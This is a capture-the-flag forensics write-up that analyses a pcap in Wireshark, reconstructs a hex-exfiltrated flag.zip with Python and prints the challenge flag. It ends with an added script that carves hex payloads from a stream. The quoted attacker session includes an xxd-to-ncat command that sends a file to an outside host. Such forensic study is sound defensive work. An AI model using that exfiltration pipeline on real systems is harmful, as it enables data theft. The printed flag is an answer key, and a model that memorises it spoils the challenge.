Writeup by erdnaxe for Cap ou Pcap

intro forensics network

November 5, 2023

Exploration

We download cap.pcap and ask file to identify it:

$ file cap.pcap
cap.pcap: pcap capture file, microsecond ts (little-endian) - version 2.4 (Ethernet, capture length 262144)

cap.pcap is a network capture in PCAP format. We open the capture in Wireshark:

cap.pcap in Wireshark

We identify two TCP sessions (each represented by a square bracket on the left):

  • the first TCP session starts at packet 1 and ends at packet 37,
  • the second TCP session starts at packet 24 and ends at packet 31.

We right click, then “Follow > TCP Stream” to take a look at the exchanged TCP data.

The first TCP stream contains some shell commands:

> id
< uid=1001(fcsc) gid=1001(fcsc) groups=1001(fcsc)
> pwd
< /home/fcsc
> w
<  07:10:25 up 24 min,  1 user,  load average: 0.00, 0.00, 0.00
< USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
< fcsc     tty7     :0               06:46   24:47   3.13s  0.00s /bin/sh /etc/xdg/xfce4/xinitrc -- /etc/X11/xinit/xserverrc
> ls
< Desktop
< Documents
< Downloads
< Music
< Pictures
< Public
< Templates
< Videos
> ls Documents
< flag.zip
> file Documents/flag.zip
< Documents/flag.zip: Zip archive data, at least v2.0 to extract
> xxd -p Documents/flag.zip | tr -d '\n' | ncat 172.20.20.133 20200
> exit

We observe that Documents/flag.zip is exfiltrated to 172.20.20.133:20200.

The second TCP stream contains:

504b0304140000000800a231825065235c39420000004700000008001c00666c61672e7478745554090003bfc8855ebfc8855e75780b000104e803000004e80300000dc9c11180300804c0bfd5840408bc33630356e00568c2b177ddef9eeb5a8fe6ee06ce8e5684f0845997192aad44ecaedc7f8e1acc4e3ec1a8eda164d48c28c77b7c504b01021e03140000000800a231825065235c394200000047000000080018000000000001000000a48100000000666c61672e7478745554050003bfc8855e75780b000104e803000004e8030000504b050600000000010001004e000000840000000000

This may be the exfiltrated Documents/flag.zip: the timing fits, as this TCP stream starts after the call to xxd -p Documents/flag.zip | tr -d '\n' | ncat 172.20.20.133 20200 and ends before exit.

Proposed solution

We reverse the xxd transformation to reconstruct Documents/flag.zip from the second TCP stream.

xxd is a Unix command that dumps binary data as hexadecimal (with -p it emits a plain hex dump, without offsets or an ASCII column, which is why the stream is one continuous hex string). Let's write a Python script to reverse this transformation:

#!/usr/bin/env python3
# Decode the plain hex dump captured in the second TCP stream back into the original bytes.
data = bytes.fromhex("504b0304140000000800a231825065235c39420000004700000008001c00666c61672e7478745554090003bfc8855ebfc8855e75780b000104e803000004e80300000dc9c11180300804c0bfd5840408bc33630356e00568c2b177ddef9eeb5a8fe6ee06ce8e5684f0845997192aad44ecaedc7f8e1acc4e3ec1a8eda164d48c28c77b7c504b01021e03140000000800a231825065235c394200000047000000080018000000000001000000a48100000000666c61672e7478745554050003bfc8855e75780b000104e803000004e8030000504b050600000000010001004e000000840000000000")
# Write the reconstructed archive to disk so it can be extracted with unzip.
with open("flag.zip", "wb") as f:
    f.write(data)

After running this script, we extract the flag and print it:

$ unzip flag.zip
Archive:  flag.zip
  inflating: flag.txt
$ cat flag.txt
FCSC{6ec28b4e2b0f1bd9eb88257d650f558afec4e23f3449197b4bfc9d61810811e3}
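As an added example (not part of the original writeup), the script below generalises the reconstruction step into a small triage helper: it scans a reassembled TCP stream for long runs of hex, decodes them, identifies the result by its magic bytes and, for a ZIP, validates the archive and reads its members in memory rather than writing the artefact to disk. The 32-byte minimum run length and the magic table are assumptions; the stream bytes are the second TCP stream from cap.pcap shown above.

```python
#!/usr/bin/env python3
"""Carve hex-encoded files out of a reassembled TCP stream and inspect them in memory."""
import io
import re
import zipfile

# Payload of the second TCP stream from cap.pcap (the hex dump of Documents/flag.zip).
SECOND_STREAM = b"504b0304140000000800a231825065235c39420000004700000008001c00666c61672e7478745554090003bfc8855ebfc8855e75780b000104e803000004e80300000dc9c11180300804c0bfd5840408bc33630356e00568c2b177ddef9eeb5a8fe6ee06ce8e5684f0845997192aad44ecaedc7f8e1acc4e3ec1a8eda164d48c28c77b7c504b01021e03140000000800a231825065235c394200000047000000080018000000000001000000a48100000000666c61672e7478745554050003bfc8855e75780b000104e803000004e8030000504b050600000000010001004e000000840000000000"

# Minimal magic-number table (an assumption; extend with the file types you care about).
MAGIC = {b"PK\x03\x04": "zip", b"\x7fELF": "elf", b"%PDF": "pdf", b"\x89PNG": "png"}

# A run of at least 32 hex byte pairs; the threshold is an assumption chosen to skip short tokens.
HEX_RUN = re.compile(rb"(?:[0-9a-fA-F]{2}){32,}")


def carve_hex_payloads(stream: bytes):
    """Return [(offset, kind, raw)] for each long hex run in the stream, decoded and typed by magic."""
    found = []
    for m in HEX_RUN.finditer(stream):
        raw = bytes.fromhex(m.group(0).decode("ascii"))
        kind = next((k for sig, k in MAGIC.items() if raw.startswith(sig)), "unknown")
        found.append((m.start(), kind, raw))
    return found


def zip_members(raw: bytes):
    """Read every member of an in-memory ZIP; raises if the archive or a member's CRC is bad."""
    with zipfile.ZipFile(io.BytesIO(raw)) as zf:
        bad = zf.testzip()  # None when all CRCs check out
        if bad is not None:
            raise ValueError(f"corrupt member: {bad}")
        return {info.filename: zf.read(info) for info in zf.infolist()}


if __name__ == "__main__":
    for offset, kind, raw in carve_hex_payloads(SECOND_STREAM):
        print(f"offset {offset}: {kind}, {len(raw)} bytes")
        if kind == "zip":
            for name, content in zip_members(raw).items():
                print(f"  {name}: {content.decode(errors='replace').strip()}")
```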